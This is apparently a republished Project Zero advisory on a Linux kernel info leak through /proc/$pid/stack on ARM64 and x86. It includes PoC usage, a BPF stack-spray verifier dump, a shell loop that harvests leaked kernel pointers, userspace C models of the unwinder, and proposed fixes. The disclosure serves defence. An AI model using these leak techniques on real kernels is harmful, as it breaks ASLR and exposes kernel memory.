Linux Semi-Arbitrary Task Stack Read On ARM64 / x86

Posted Oct 18, 2018
Authored by Jann Horn, Google Security Research

Linux suffers from a semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack.

tags | advisory, arbitrary, x86
systems | linux
MD5 | 7100e417a396e293988088f73c3b7c3a

Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack 




This issue probably had the most impact on ARM64 kernels before
commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in
v4.17); luckily, that hardening patch was backported all the way to v4.4 (but
not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized
kernel stack of a task that is concurrently executing on another CPU. (x86 has
a check, but that check is racy, and a comment also documents that it is racy.)
This means that the kernel can potentially attempt to unwind an active task
stack starting from an outdated frame pointer, causing the kernel to interpret
new stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the
target's task stack area are dereferenced.
On x86, it is also ensured that only stack frames whose saved instruction
pointer points to some valid text section are printed; on ARM64, stack frames
are printed independent of where the saved instruction pointer points.
The format string element used for printing such stack traces is "%pB", which is
normally used for writing information about kernel crashes to the console; on
kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which
falls back to printing raw addresses with "0x%lx" when an address can't be
mapped to a symbol.
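
The symbol-or-raw-address fallback can be sketched in userspace as follows. This is only a rough model, not the kernel's sprint_backtrace(): the symbol table, its addresses, and the function name format_entry() are made up for illustration, and details of the real formatter (module names, for example) are left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical stand-in for the kernel symbol table. */
struct sym {
	unsigned long long start;
	unsigned long long size;
	const char *name;
};

static const struct sym symtab[] = {
	{ 0x1000ULL, 0x200ULL, "hypothetical_func_a" },
	{ 0x1200ULL, 0x100ULL, "hypothetical_func_b" },
};

/*
 * Format one trace entry: "name+0xoff/0xsize" if addr falls inside a known
 * symbol, otherwise the raw address. Returns what snprintf() returns.
 */
int format_entry(char *buf, size_t len, unsigned long long addr)
{
	size_t i;

	assert(buf != NULL && len > 0);
	for (i = 0; i < sizeof(symtab) / sizeof(symtab[0]); i++) {
		if (addr >= symtab[i].start &&
		    addr - symtab[i].start < symtab[i].size)
			return snprintf(buf, len, "%s+0x%llx/0x%llx",
					symtab[i].name,
					addr - symtab[i].start,
					symtab[i].size);
	}
	/* No symbol matched: the raw value is echoed back to the reader. */
	return snprintf(buf, len, "0x%llx", addr);
}
```

In this model, an address inside a known symbol reveals which symbol contains it, and any other value is printed verbatim.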

On ARM64, the kernel ensures that stack frames are 16-byte-aligned.

This leads to three potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer
and observe to which symbol the kernel maps it. This could be used both to
break kernel text ASLR and (if the attacker doesn't have access to the kernel
image anyway) to gain more fine-grained information about the layout of
kernel code.
2. An attacker can fake a stack frame that points to an arbitrary location in
the task stack (subject to alignment constraints) in order to leak data
stored at that address into the stack trace returned to userspace.
(This is more practical on ARM64, but might also work on x86 if you only need
to leak one byte at a time.)
3. A DoS that is, from my perspective, relatively boring: it looks as if
building a loop out of stack frames whose saved instruction pointers point
into scheduler code will send the task that's attempting to read
/proc/$pid/stack into an endless loop.
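
Attack 2 can be illustrated with a small userspace simulation. This is a sketch under stated assumptions, not kernel code: the stack is an ordinary array, SIM_BASE is a made-up address, and walk() models only the two checks described above (16-byte alignment and "inside the task stack"). The names sim_stack, walk() and demo_leak() are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SIM_WORDS 128                    /* 1 KiB simulated task stack */
#define SIM_BYTES (SIM_WORDS * 8ULL)
#define SIM_BASE  0x10000ULL             /* made-up address of the lowest word */
#define MARKER    0xbadbeefbadbeef00ULL  /* attacker-chosen fake saved pc */
#define SECRET    0x1122334455667788ULL  /* value the attacker wants to read */

static uint64_t sim_stack[SIM_WORDS];

/* Translate a simulated address into a pointer into the array. */
static uint64_t *slot(uint64_t addr)
{
	assert(addr >= SIM_BASE && addr - SIM_BASE < SIM_BYTES);
	assert((addr & 7) == 0);
	return &sim_stack[(addr - SIM_BASE) / 8];
}

/* The only checks modelled: alignment and stack bounds. */
static int frame_ok(uint64_t fp)
{
	if (fp & 0xf)
		return 0;
	return fp >= SIM_BASE && fp - SIM_BASE <= SIM_BYTES - 16;
}

/* Follow {saved fp, saved pc} records, recording each saved pc. */
size_t walk(uint64_t fp, uint64_t *out, size_t max)
{
	size_t n = 0;

	while (n < max && frame_ok(fp)) {
		out[n++] = *slot(fp + 8);
		fp = *slot(fp);
	}
	return n;
}

/* A stale frame pointer lands on attacker data that points next to SECRET. */
size_t demo_leak(uint64_t *out, size_t max)
{
	uint64_t stale_fp = SIM_BASE + 0x100;     /* where the unwinder starts */
	uint64_t secret_addr = SIM_BASE + 0x208;  /* must be 8 mod 16 */
	size_t i;

	for (i = 0; i < SIM_WORDS; i++)
		sim_stack[i] = 0;
	*slot(secret_addr) = SECRET;
	*slot(stale_fp) = secret_addr - 8;        /* fake saved fp */
	*slot(stale_fp + 8) = MARKER;             /* fake saved pc */
	return walk(stale_fp, out, max);
}
```

In this model the walk yields MARKER followed by SECRET and then stops, because the next "saved fp" is 0 and fails the bounds check. The alignment constraint shows up as the requirement that the leaked word sit 8 bytes above a 16-byte boundary. The max bound is what keeps this sketch from looping if a fake record points back at itself.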

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a
custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with
CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more
normal way to spray things on the kernel stack in the right places), built with
gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame
pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============
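
One possible reading of why each marker line is followed by the leaked value, based only on the verifier listing and the output above (the PoC source is not reproduced here, so this is an interpretation rather than a description of pipe_read.c): the listing stores r1 = r10 - 24 and the marker r0 in alternating 8-byte slots, and stores r10 itself at r10 - 16. If r10 is 8 mod 16, as the leaked value 0xffffff800e5cbb78 is, each {r1, r0} pair starts on a 16-byte boundary and looks like a frame record whose saved frame pointer is r10 - 24, and the record at r10 - 24 has r10 in its saved-pc slot. The arithmetic can be checked with a short sketch; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* ARM64 frame records must start on a 16-byte boundary. */
int is_frame_slot(uint64_t r10, unsigned int off_below)
{
	return ((r10 - off_below) & 0xf) == 0;
}

/*
 * In the visible part of the listing, r10 - off_below holds r1 when
 * (off_below - 40) is a multiple of 16, and the slot 8 bytes above it
 * holds r0 (the marker) for off_below in 56..504.
 * Returns 1 if r10 - off_below would be accepted as a record
 * {fp = r10 - 24, pc = marker}.
 */
int is_sprayed_record(uint64_t r10, unsigned int off_below)
{
	assert(off_below >= 56 && off_below <= 504);
	if ((off_below - 40) % 16 != 0)
		return 0;  /* this slot holds the marker, not r1 */
	return is_frame_slot(r10, off_below);
}
```

For r10 = 0xffffff800e5cbb78, offsets 56, 72, ..., 504 all qualify, and r10 - 24 is itself 16-byte aligned, which would be consistent with the marker being followed by the value of r10 in the trace.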

In terminal 3 (note that this requires kernel.kptr_restrict==1; with
kptr_restrict=0, the addresses are printed as garbage):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000 20480 _do_fork+0xe8/0x420 pages=4 vmalloc
#
==============
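
The same comparison can be done programmatically. The following is a minimal sketch, assuming the line format shown above; the helper name addr_in_vmalloc_line() is made up.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Parse the "0xSTART-0xEND" prefix of a /proc/vmallocinfo line and report
 * whether addr lies in [START, END). Returns -1 if the line does not parse.
 */
int addr_in_vmalloc_line(const char *line, unsigned long long addr)
{
	unsigned long long start, end;

	assert(line != NULL);
	if (sscanf(line, "0x%llx-0x%llx", &start, &end) != 2)
		return -1;
	return addr >= start && addr < end;
}
```

Applied to the line above, 0xffffff800e5cbb78 falls inside the range allocated by _do_fork, while the other value seen in the trace, 0xffffffdf36987000, does not.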


I'm not sure what the best fix for this is.

32-bit ARM is playing it safe and just refuses to print stack traces for
non-current tasks if CONFIG_SMP is on:
==============
	if (tsk != current) {
#ifdef CONFIG_SMP
		/*
		 * What guarantees do we have here that 'tsk' is not
		 * running on another CPU? For now, ignore it as we
		 * can't guarantee we won't explode.
		 */
		if (trace->nr_entries < trace->max_entries)
			trace->entries[trace->nr_entries++] = ULONG_MAX;
		return;
#else
==============

With my "annoying security person" hat on: Would it make sense to just gate
proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)?
That way, even if the unwind code gets some edgecase wrong, it won't cause the
disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is
probably not so straightforward...

One approach would be to fire an IPI to request that the target task dumps its
own stack.

Another approach might be to check somehow, between every time a pointer is
read from the target's stack and the time it is dereferenced, whether the
target task has been scheduled in the meantime. Perhaps by checking p->nvcsw,
p->nivcsw and p->on_cpu, if that works without races? The reason why I'd like
to have more than just one check at the end for this approach is
(non-speculative) side channels.
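
The control flow of that second approach might look roughly like the sketch below. It is a single-threaded userspace model that only shows where the checks would sit; it says nothing about whether the real fields can be read without races, which is exactly the open question. struct task_model, struct sched_snapshot and both function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace stand-in for the three task_struct fields named above. */
struct task_model {
	unsigned long nvcsw;   /* voluntary context switches */
	unsigned long nivcsw;  /* involuntary context switches */
	int on_cpu;            /* nonzero while the task is running */
};

struct sched_snapshot {
	unsigned long nvcsw;
	unsigned long nivcsw;
};

/* Refuse to start if the target is running; otherwise record the counters. */
int snapshot_take(const struct task_model *t, struct sched_snapshot *s)
{
	assert(t != NULL && s != NULL);
	if (t->on_cpu)
		return -1;
	s->nvcsw = t->nvcsw;
	s->nivcsw = t->nivcsw;
	return 0;
}

/*
 * Meant to be called after each read from the target's stack and before the
 * value read is used as a pointer.
 */
int snapshot_still_valid(const struct task_model *t,
			 const struct sched_snapshot *s)
{
	assert(t != NULL && s != NULL);
	return !t->on_cpu && t->nvcsw == s->nvcsw && t->nivcsw == s->nivcsw;
}
```

An unwinder built this way would abort the walk as soon as snapshot_still_valid() returns 0, instead of validating only once at the end.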


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: jannh
